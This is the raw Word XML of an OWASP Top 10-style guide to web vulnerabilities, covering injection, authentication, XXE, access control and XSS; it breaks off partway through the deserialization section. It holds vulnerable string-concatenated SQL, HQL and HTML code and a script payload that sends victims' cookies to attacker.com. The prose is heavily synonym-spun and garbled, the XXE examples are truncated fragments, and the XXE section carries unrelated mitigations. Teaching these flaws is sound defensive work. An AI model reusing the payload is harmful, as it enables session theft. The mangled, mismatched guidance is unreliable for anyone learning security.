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181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A1-INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A03EA" w:rsidRDefault="00BD47BB" w:rsidP="003A03EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Injection defects </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>like the NoSQL, Operating System, LDAP</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve"> and SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> happens when untrusted information is set to a </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>syntax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve">query. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A03EA" w:rsidRDefault="003A03EA" w:rsidP="003A03EA"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="003A03EA">
      <w:r>
        <w:t>Mitigation/ How to Avoid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="003A03EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve"> utilize</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000267E3">
        <w:t>safeties</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> keeps away from the utilization of the mediator totally or gives a</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve">n interface </w:t>
      </w:r>
      <w:r w:rsidR="000267E3">
        <w:t>those is parameterized or then again move</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>utilize</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> Object</w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t xml:space="preserve"> Relational Mapping (ORM) Tools</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Use positive or ‘whitelist’ server-</w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t xml:space="preserve">side info approval. It is not </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a total barrier the same </w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t>numbers of utilizations require</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uncommon characters for example content </w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t>places or portable applications in API.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For any lingering dynamic inquiries, escape extraordinary characters </w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t>utilizing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the particular escape language structure for that translator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="009B5728">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Utilizing the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> LIMIT and </w:t>
      </w:r>
      <w:r>
        <w:t>many other</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:t>commands</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> inside inquiries to avoid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="009B5728">
      <w:r>
        <w:t xml:space="preserve">Situation #1: The application is utilizing the </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">untrusted </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> in the construction of the following SQL call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="009B5728">
      <w:r>
        <w:t>Situation #2: The blind trust application</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> in frameworks may </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have an outcome </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">in queries that are </w:t>
      </w:r>
      <w:r>
        <w:t>very vulnerable, (Ex. Hibernate Query Language ):</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'"); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A2: BROKEN AUTHENTICATION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="000267E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Application capacities identified with validation and session administration are regularly executed mistakenly, enabling aggress</w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">ors to bargain passwords, session tokens, or abusing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">other usage imperfections to expect other clients’ personalities incidentally or permanently. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Mitigation/ How to Prevent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Where conceivable, actualize multi-factor confirmation to avoid computerized, qualification stuffing, brute power, and stolen certification reuse attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not dispatch or convey with any default certifications, especially for administrator clients. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement feeble secret word checks, for example, testing new or passwords </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">that was changed </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">against </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rundown of the main 10000 most noticeably bad passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Align secret word length, multifaceted nature and revolution arrangements with NIST 800-63 B's rules in segment 5.1.1 for Memorized Insider facts or other current, confirm based watchword approaches. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00CE5F24" w:rsidRDefault="00CE5F24"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5F24" w:rsidRDefault="00CE5F24"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Sit</w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">uation #1: Credential stuffing is </w:t>
      </w:r>
      <w:r>
        <w:t>the utilization of arrangements of passwords</w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve"> that are known</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, is a typical assault. On the off chance that an application does not actualize mechanized risk or accreditation stuffing insurances, the application can be utilized as a secret word prophet to decide whether the certifications are legitimate. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Situation #2: </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t>Most of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> verification </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t>attacks happen because of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> proceeded with utilization of passwords as </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sole factor. Once considered best practices, watchword turn and multifaceted nature prerequisites are seen as urging clients to utilize, and reuse, frail passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A4: XML EXTERNAL ENTITIES (XXE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="000267E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Numerous has established or arranged XMP processors assess outside elements can be utilized to unveil inner documents utilizing the record URI handler, interior record shares, remote code execution, internal port checking, and denial of administration assaults.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Mitigation/ How to prevent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Classify information handled, put away, or transmitted by an application. Recognize which information is delicate as indicated by protection laws, administrative necessities, or business needs. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply controls according to the order. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Don't store delicate information superfluously. Dispose of it when conceivable or utilize PCI DSS consistent tokenization or even truncation. Information that isn't held can't be stolen. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Make beyond any doubt to encode every touchy datum very still. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5F24" w:rsidRDefault="00CE5F24"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:r>
        <w:t xml:space="preserve">Situation #1: Attempting </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00C07476">
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C07476">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> the server</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>: ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>&gt; &amp;xxe;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:r>
        <w:t>Situation #2: Probing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> the server's private network by changing the above ENTITY line to: ]&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Sc</w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">enario #3: Attempting </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a denial-of-service attack by </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">adding an </w:t>
      </w:r>
      <w:r>
        <w:t>endless file: ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A5: BROKEN ACCESS CONTROL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="000267E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Restrictions on what validated clients are permitted to do are regularly not legitimately authorized. Attackers can abuse these flaws to get to unapproved usefulness or potentially information for example, get to other clients’ records, see touchy documents, alter other clients’ information and change rights.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Mitigations/ How to prevent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement get to control systems once and re-utilize them through the application, including limiting CORS utilization. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Model access controls ought to implement record proprietorship, rather than tolerating that the client can make, read, refresh, or erase any record. Unique application business confine prerequisites ought to be implemented by space models. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Disable web server registry posting and guarantee document metadata (e.g. .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) and reinforcement records are absent inside web roots. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log get to control disappointments, caution administrators when proper (e.g. rehashed disappointments). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000267E3" w:rsidRDefault="000267E3"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B0E34" w:rsidRDefault="006B0E34"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:r>
        <w:t>Situation</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> #1: </w:t>
      </w:r>
      <w:r>
        <w:t>An</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> application </w:t>
      </w:r>
      <w:r>
        <w:t>that is utilizing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>untrusted</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> in a SQL call that is accessing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the information in the </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">account: </w:t>
      </w:r>
      <w:r w:rsidR="006B0E34">
        <w:t>pstmt.setString (</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:r w:rsidR="006B0E34">
        <w:t>request.getParameter (</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">"acct")); </w:t>
      </w:r>
      <w:r w:rsidR="006B0E34">
        <w:t>ResultSet</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> results = </w:t>
      </w:r>
      <w:r w:rsidR="006B0E34">
        <w:t>pstmt.executeQuery (</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> ); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:r>
        <w:t>Situation</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> #2: S</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">imply </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>forcing the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> browsers to target URLs. </w:t>
      </w:r>
      <w:r w:rsidR="006B0E34">
        <w:t>Administrators’</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> are required for </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>accessing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>administrators</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> page. http://example.com/app/getappInfo http://example.com/app/admin_getappInfo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>If</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin page, this is a flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A7: CROSS-SITE SCRIPTING (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="000267E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>XSS flaws happen at whatever point an application incorporates untrusted information in another page without appropriate approval or getting away, or updates a current site with client provided information utilizing a program API that can make HTML or JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00C07476">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Mitigation/ Preventions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilizing structures that naturally </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>escaping the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS by outline, for example, the most recent </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve">React JS and </w:t>
      </w:r>
      <w:r>
        <w:t>Ruby on Rails</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Take in the impediments of every structure's XSS insurance and suitably handle the utilization cases which are not secured. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Escaping </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>the unknown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP ask for information in light of the setting in the </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>Hypertext Markup Language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> yield will</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> be resolving the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Reflected and Stored XSS vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Applying setting touchy encoding while changing the prog</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve">ram report on the customer acts </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">against DOM XSS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="003175A5" w:rsidP="000267E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Enables the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> Content Security Policy (CSP) is a resistance inside and out alleviating </w:t>
      </w:r>
      <w:r>
        <w:t>control</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> ag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ainst XSS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000267E3" w:rsidRDefault="000267E3" w:rsidP="000267E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962AB8" w:rsidRDefault="00962AB8"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Situation 1: The application utilizes untrusted information in the development of the accompanying HTML bit without approval or getting away: (String) page += "&lt;input name='creditcard' type='TEXT' value='" + </w:t>
      </w:r>
      <w:r w:rsidR="00962AB8">
        <w:t>request.getParameter (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"CC") + "'&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">The assailant alters the 'CC' parameter in the program to: '&gt;&lt;script&gt;document.location= </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>'http</w:t>
      </w:r>
      <w:r w:rsidR="00962AB8">
        <w:t>: /</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/www.attacker.com/cgi-receptacle/cookie.cgi? foo='+document.cookie&lt;/script&gt;'. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A8: INSECURE DESERIALIZATION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="000267E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unreliable deserialization frequently prompts remote code execution. Regardless of whether deserialization flaws don’t bring about</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> execution of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> remote code, </w:t>
      </w:r>
